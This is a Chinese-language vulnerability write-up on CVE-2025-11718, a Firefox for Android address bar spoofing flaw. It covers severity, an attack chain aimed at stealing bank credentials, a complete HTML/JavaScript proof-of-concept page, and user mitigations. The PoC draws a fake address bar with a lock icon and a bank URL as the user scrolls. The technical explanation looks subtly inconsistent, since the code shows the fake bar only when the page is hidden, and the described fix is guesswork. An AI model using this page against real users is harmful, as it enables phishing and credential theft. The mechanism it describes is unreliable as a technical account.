CVE-2025-11718 Firefox Android地址栏欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-11718

漏洞类型

地址栏欺骗（Address Bar Spoofing）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Mozilla Firefox (Android)

漏洞概述

CVE-2025-11718是Mozilla Firefox浏览器在Android平台上存在的一个地址栏欺骗（Address Bar Spoofing）漏洞。该漏洞由Mozilla安全团队于2025年10月14日披露，CVSS评分为6.5，属于中危级别。

该漏洞的核心问题在于，当用户在Android设备上使用Firefox浏览器浏览网页并进行滚动操作时，浏览器的地址栏会自动隐藏以提供更大的浏览区域。然而，恶意网页可以利用浏览器对页面可见性变化（visibilitychange事件）的处理机制，在地址栏隐藏的瞬间伪造一个虚假的地址栏界面元素，欺骗用户认为他们正在访问某个可信任的网站，实际上他们可能被重定向到了恶意网站。

这种类型的漏洞属于UI欺骗（User Interface Spoofing）攻击的一种，攻击者利用浏览器UI状态转换的间隙进行欺骗。漏洞的CVSS向量表明该漏洞可通过网络远程利用，无需认证，但需要用户交互（如点击链接或访问恶意页面）。虽然漏洞本身不影响机密性和可用性，但对完整性有较高影响，因为攻击者可以成功欺骗用户关于当前访问网站的身份信息。

该漏洞已在Firefox 144版本中修复，用户应及时更新浏览器以避免受到此类攻击的影响。

技术细节

该漏洞的技术原理基于Android版Firefox浏览器的地址栏自动隐藏机制以及网页对visibilitychange事件的监听能力。

**漏洞原理：**
1. 在Android平台上，当用户向下滚动页面时，Firefox浏览器会自动隐藏顶部的地址栏，以提供更大的内容显示区域。这是移动浏览器的常见UX设计模式。
2. 当地址栏被隐藏时，浏览器会触发visibilitychange事件，通知页面其可见性状态发生了变化。
3. 恶意页面可以监听visibilitychange事件，在检测到地址栏隐藏后，利用HTML和CSS技术动态创建一个外观与Firefox地址栏完全相同的UI元素，覆盖在页面顶部。
4. 攻击者可以在伪造的地址栏中显示任意URL（例如银行网站、社交媒体等），从而欺骗用户认为他们正在访问一个可信任的网站。

**利用方式：**
- 攻击者创建一个包含恶意JavaScript代码的网页，该代码监听document的visibilitychange事件。
- 当用户滚动页面导致地址栏隐藏时，恶意代码立即在页面顶部插入一个精心设计的HTML元素，模拟Firefox地址栏的外观和行为。
- 伪造的地址栏可以显示任意URL，并可能包含HTTPS锁图标等安全标识，增强欺骗效果。
- 用户在看到伪造的地址栏后，可能会误以为自己仍在原始网站上，从而输入敏感信息或执行其他危险操作。

**修复方案：**
Mozilla在Firefox 144中修复了此漏洞，修复方式可能包括限制网页在地址栏隐藏时创建覆盖UI的能力，或者修改visibilitychange事件的触发时机，防止恶意页面利用此UI状态转换间隙进行欺骗。

攻击链分析

STEP 1

步骤1：诱导用户访问恶意页面

攻击者通过钓鱼邮件、社交媒体或其他方式诱导用户在其Android设备上的Firefox浏览器中访问一个精心构造的恶意网页。

STEP 2

步骤2：用户滚动页面触发地址栏隐藏

当用户在恶意页面上向下滚动浏览内容时，Firefox浏览器为提供更好的浏览体验会自动隐藏顶部的地址栏。

STEP 3

步骤3：监听visibilitychange事件

恶意页面中的JavaScript代码通过监听document的visibilitychange事件，检测到地址栏隐藏的时机。

STEP 4

步骤4：注入伪造地址栏

在地址栏隐藏的瞬间，恶意代码立即在页面顶部创建一个外观与Firefox真实地址栏高度相似的HTML元素，显示攻击者预设的虚假URL（如银行、支付平台等可信任网站）。

STEP 5

步骤5：欺骗用户执行敏感操作

用户看到伪造的地址栏后，误以为自己仍在可信任网站上，从而输入账号密码、信用卡信息或其他敏感数据，导致信息泄露或财产损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11718 PoC: Firefox Android Address Bar Spoofing -->
<!-- This PoC demonstrates how a malicious page can spoof the address bar -->
<!-- when the real address bar is hidden due to scrolling on Android Firefox -->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Loading...</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
            height: 300vh; /* Force scrollable content to hide address bar */
            background: #ffffff;
        }
        /* Fake address bar styling to mimic Firefox on Android */
        #fake-address-bar {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            height: 56px;
            background: #f9f9fb;
            border-bottom: 1px solid #e0e0e0;
            padding: 8px 12px;
            align-items: center;
            z-index: 999999;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }
        #fake-address-bar .url-container {
            flex: 1;
            background: #ffffff;
            border: 1px solid #d0d0d0;
            border-radius: 18px;
            padding: 8px 14px;
            display: flex;
            align-items: center;
            gap: 8px;
            font-size: 14px;
            color: #333;
        }
        #fake-address-bar .lock-icon {
            color: #128a0e;
            font-size: 14px;
        }
        .content {
            padding: 20px;
            margin-top: 60px;
        }
        .scroll-trigger {
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            color: #666;
            font-size: 16px;
        }
    </style>
</head>
<body>
    <!-- Fake address bar element -->
    <div id="fake-address-bar">
        <div class="url-container">
            <span class="lock-icon">🔒</span>
            <span id="fake-url">https://www.secure-bank-login.com/account</span>
        </div>
    </div>

    <!-- Page content to force scrolling -->
    <div class="content">
        <h1>Welcome to Our Service</h1>
        <p>Please scroll down to continue...</p>
    </div>
    <div class="scroll-trigger">⬇ Scroll Down ⬇</div>
    <div class="scroll-trigger">⬇ Keep Scrolling ⬇</div>

    <!-- Malicious script to exploit visibilitychange event -->
    <script>
        // Listen for visibility change events triggered when address bar hides
        document.addEventListener('visibilitychange', function() {
            if (document.hidden) {
                // When page becomes hidden (address bar hides), show fake address bar
                document.getElementById('fake-address-bar').style.display = 'flex';
            } else {
                // Hide fake address bar when real one is visible
                document.getElementById('fake-address-bar').style.display = 'none';
            }
        });

        // Additional: Also trigger on scroll as fallback
        let lastScrollY = 0;
        window.addEventListener('scroll', function() {
            const fakeBar = document.getElementById('fake-address-bar');
            if (window.scrollY > 50) {
                // Show fake address bar when user scrolls (real one hides)
                fakeBar.style.display = 'flex';
            } else {
                fakeBar.style.display = 'none';
            }
        });
    </script>
</body>
</html>

影响范围

Mozilla Firefox < 144 (Android)

防御指南

临时缓解措施

在无法立即升级Firefox的情况下，建议用户：1）避免在Android版Firefox上点击可疑链接或访问不熟悉的网站；2）在进行任何敏感操作（如登录银行账户、输入密码等）前，先向上滚动页面使地址栏显示，核实当前URL是否正确；3）使用书签或手动输入URL的方式访问重要网站；4）关注页面内容与URL是否一致，如发现异常立即停止操作；5）考虑临时使用其他浏览器访问敏感网站。